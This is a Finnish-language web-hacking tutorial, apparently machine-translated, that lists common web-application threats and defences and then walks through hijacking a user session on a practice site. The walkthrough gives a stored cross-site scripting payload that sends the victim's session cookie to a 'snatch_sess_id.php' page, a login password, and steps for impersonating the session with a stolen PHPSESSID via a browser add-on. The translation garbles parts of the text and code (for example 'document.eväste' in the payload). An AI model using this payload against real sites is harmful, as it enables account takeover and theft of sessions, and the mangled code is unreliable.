useammalla ihmisellä on pääsy Internetiin kuin koskaan aiemmin. Tämä on saanut monet organisaatiot kehittämään verkkopohjaisia sovelluksia, joita käyttäjät voivat käyttää verkossa vuorovaikutuksessa organisaation kanssa. Verkkosovellusten huonosti kirjoitettua koodia voidaan hyödyntää luvattoman pääsyn saamiseksi arkaluonteisiin tietoihin ja verkkopalvelimiin.

tässä opetusohjelmassa opit hakkeroimaan verkkosivustoja, ja esittelemme sinulle verkkosovellusten hakkerointitekniikoita ja vastatoimia, joita voit ottaa käyttöön suojautuaksesi tällaisilta hyökkäyksiltä.

tämän opetusohjelman aiheet

• mikä on verkkosovellus? Mitä ovat verkkouhat?
• miten suojata sivustosi hakkeroinneilta?
• Website hacking tricks: Hack a Website online!

mikä on verkkosovellus? Mitä ovat verkkouhat?

verkkosovellus (eli verkkosivusto) on sovellus, joka perustuu asiakas-palvelin-malliin. Palvelin tarjoaa tietokannan käyttöoikeuden ja liiketoimintalogiikan. Sitä ylläpidetään www-palvelimella. Asiakassovellus toimii client web-selaimella. Web-sovellukset on yleensä kirjoitettu kielillä, kuten Java, C#, ja VB.Net, PHP, ColdFusion Markup kieli jne. web-sovelluksissa käytettyjä tietokantamoottoreita ovat mm. MySQL, MS SQL Server, PostgreSQL, SQLite jne.

useimmat verkkosovellukset sijaitsevat julkisilla palvelimilla, joihin pääsee Internetin kautta. Tämä tekee niistä haavoittuvia hyökkäyksille helpon saavutettavuuden vuoksi. Seuraavat ovat yleisiä web-sovellusuhkia.

• SQL Injection – tämän uhan tavoitteena voi olla kirjautumisalgoritmien ohittaminen, datan sabotointi jne.
• palvelunestohyökkäykset– tämän uhan tavoitteena voi olla estää laillisten käyttäjien pääsy resurssiin
• Cross Site Scripting XSS– uhan tavoitteena voi olla syöttää koodia, joka voidaan suorittaa asiakaspuolen selaimella.
• eväste/Istuntomyrkytys– tämän uhan tavoitteena on muokata hyökkääjän evästeitä / istuntotietoja luvattoman pääsyn saamiseksi.
• lomakkeiden peukalointi – uhan tavoitteena on muuttaa lomaketietoja, kuten hintoja verkkokauppasovelluksissa, jotta hyökkääjä voi saada kohteita alennettuun hintaan.
• Code Injection-tämän uhan tavoitteena on pistää koodia, kuten PHP, Python jne. se voidaan suorittaa palvelimella. Koodi voi asentaa takaovia, paljastaa arkaluonteisia tietoja jne.
• Defacement– tämän uhan tavoitteena on muokata sivustolla näytettyä sivua ja ohjata kaikki sivupyynnöt yhdelle sivulle, joka sisältää hyökkääjän viestin.

miten suojata sivustosi hakkeroinneilta?

organisaatio voi ottaa käyttöön seuraavan käytännön suojautuakseen www-palvelinhyökkäyksiltä.

• SQL Injection– käyttäjän parametrien puhdistus ja validointi ennen niiden lähettämistä tietokantaan käsiteltäväksi voi auttaa vähentämään SQL Injection-hyökkäyksen mahdollisuutta. Tietokantamoottorit, kuten MS SQL Server, MySQL jne. tuki parametrit, ja valmiita lausuntoja. Ne ovat paljon turvallisempia kuin perinteiset SQL-lauseet
• palvelunestohyökkäykset – palomuureilla voidaan pudottaa liikennettä epäilyttävästä IP-osoitteesta, jos hyökkäys on yksinkertainen DoS. Oikea kokoonpano verkkojen ja tunkeutumisen tunnistusjärjestelmä voi myös auttaa vähentämään mahdollisuuksia DoS hyökkäys onnistunut.
• Cross Site Scripting – validointi ja sanitizing otsikot, parametrit läpi URL, form parametrit ja piilotetut arvot voivat auttaa vähentämään XSS hyökkäyksiä.
• Evästemyrkytys– tämä voidaan estää salaamalla evästeiden sisältö, ajoittamalla evästeet jonkin ajan kuluttua ja liittämällä evästeet niiden luomiseen käytettyyn asiakkaan IP-osoitteeseen.
• muoto karkaisu – tämä voidaan estää validoimalla ja varmentamalla käyttäjän syöte ennen sen käsittelyä.
• Code Injection – tämä voidaan estää käsittelemällä kaikkia parametreja datana suoritettavan koodin sijaan. Puhdistamista ja validointia voidaan käyttää tämän toteuttamiseksi.
• Defacement – hyvän web-sovelluskehityksen suojauskäytännön tulisi varmistaa, että se tiivistää yleisesti käytetyt haavoittuvuudet www-palvelimelle pääsemiseksi. Tämä voi olla oikea kokoonpano käyttöjärjestelmän, web server-ohjelmisto, ja parhaat tietoturvakäytännöt kehitettäessä web-sovelluksia.

Website hacking tricks: Hack a Website online

tässä website hacking practical skenaariossa aiomme kaapata web-sovelluksen käyttäjän istunnon, joka sijaitsee osoitteessa www.techpanda.org. Käytämme cross site scripting lukea eväste istunnon tunnus ja käyttää sitä tekeytyä laillinen käyttäjä istunto.

oletus on, että hyökkääjällä on pääsy verkkosovellukseen ja hän haluaisi kaapata muiden samaa sovellusta käyttävien käyttäjien istunnot. Tämän hyökkäyksen tavoitteena voisi olla saada järjestelmänvalvojan pääsy verkkosovellukseen olettaen, että hyökkääjän pääsytili on rajoitettu.

aloittaminen

• avoin http://www.techpanda.org/
• harjoitustarkoituksiin on erittäin suositeltavaa päästä SQL-injektiolla. Katso tästä artikkelista lisätietoja siitä, miten se tehdään.
• Kirjautumissähköposti on Tämä sähköpostiosoite on suojattu spamboteilta. Tarvitset JavaScript-tuen nähdäksesi sen., salasana on Password2010
• Jos olet kirjautunut sisään onnistuneesti, saat seuraavan dashboard

• klikkaa Lisää uusi yhteyshenkilö
• kirjoita seuraava etunimeksi

<a href=# onclick=\”document.location = \ ’http://techpanda.org/snatch_sess_id.php?c=\’+escape\(document.eväste\)\;\”>tumma</a>

täällä,

yllä oleva koodi käyttää JavaScriptiä. Se lisää hyperlinkin onclick tapahtuma. Kun pahaa-aavistamaton käyttäjä napsauttaa linkkiä, tapahtuma hakee PHP-evästeistunnon tunnuksen ja lähettää sen snatch_sess_id.php: n sivu yhdessä URL-osoitteen istuntotunnuksen kanssa

• Enter the remaining details as shown below
• klikkaa Tallenna muutokset

• kojelauta näyttää nyt seuraavalta ruudulta

• koska cross site script-koodi on tallennettu tietokantaan, se ladataan joka kerta käyttäjät, joilla on käyttöoikeudet kirjautuminen
• oletetaan, että järjestelmänvalvoja kirjautuu ja napsauttaa hyperlinkkiä, joka sanoo tumma
• hän/hän saa ikkunan, jossa istuntotunnus näkyy URL-osoitteessa

huomaa: skripti voi lähettää arvon joillekin etäpalvelin, jossa phpsessid on tallennettu, käyttäjä ohjataan takaisin verkkosivustolle ikään kuin mitään ei olisi tapahtunut.

Huomautus: arvo saat voi olla erilainen kuin yksi tämän verkkosivun Hakkerointi opetusohjelma, mutta käsite on sama

Session tekeytyminen käyttämällä Firefox ja väärentää tietoja lisäosa

alla vuokaavio näyttää vaiheet, jotka sinun on toteutettava tämän harjoituksen loppuun.

• tarvitset Firefox-verkkoselaimen tähän osioon ja tietojen lisäosan väärentämiseen
• avaa Firefox ja asenna lisäosa alla olevien kaavioiden mukaisesti

• Search for tamper data then click on install as shown as above

• klikkaa on Accept and Install…

• Napsauta Käynnistä uudelleen nyt, kun asennus on valmis
• ota Firefoxin valikkopalkki käyttöön, jos se ei näy

napsauta Työkalut-valikkoa ja valitse peukaloinnin tiedot alla esitetyllä tavalla

• saat seuraavan ikkunan. Huomautus: Jos ikkuna ei ole tyhjä, paina tyhjennä-nappia

• klikkaa Käynnistä Peukalointivalikko
• vaihda takaisin Firefox-selaimeen, type http://www.techpanda.org/dashboard.PHP paina enter-näppäintä ladataksesi sivun
• saat seuraavan ponnahdusikkunan Tamperin tiedoista

• ponnahdusikkunassa on kolme (3) vaihtoehtoa. Peukalointivalinnan avulla voit muokata HTTP-otsikkotietoja ennen niiden toimittamista palvelimelle.
• klikkaa sitä
• saat seuraavan ikkunan

• Kopioi hyökkäyksen URL-osoitteesta kopioimasi PHP-istuntotunnus ja liitä se tasamerkin jälkeen. Arvosi pitäisi nyt näyttää tältä

PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2

• klikkaa OK-painiketta
• saat Peukalointidatan ponnahdusikkunan uudelleen

• uncheck the checkbox that asks continue peukalointi?
• napsauta Lähetä-painiketta, kun se on tehty
• sinun pitäisi nähdä kojelauta kuten alla on esitetty

Huomautus: emme kirjautuneet, tekeytyneet kirjautumisistunnoksi käyttäen phpsessid-arvoa, jonka haimme cross site scripting

Summary

• web-sovellus perustuu palvelin-asiakas-malliin. Asiakaspuoli käyttää verkkoselainta päästäkseen käsiksi palvelimen resursseihin.
• verkkosovellukset ovat yleensä saatavilla Internetissä. Tämä tekee niistä alttiita hyökkäyksille.
• verkkosovellusten uhkia ovat esimerkiksi SQL-injektio, koodin injektio, XSS, Defacement, Evästemyrkytys jne.
• hyvä tietoturvapolitiikka verkkosovelluksia kehitettäessä voi auttaa tekemään niistä turvallisia.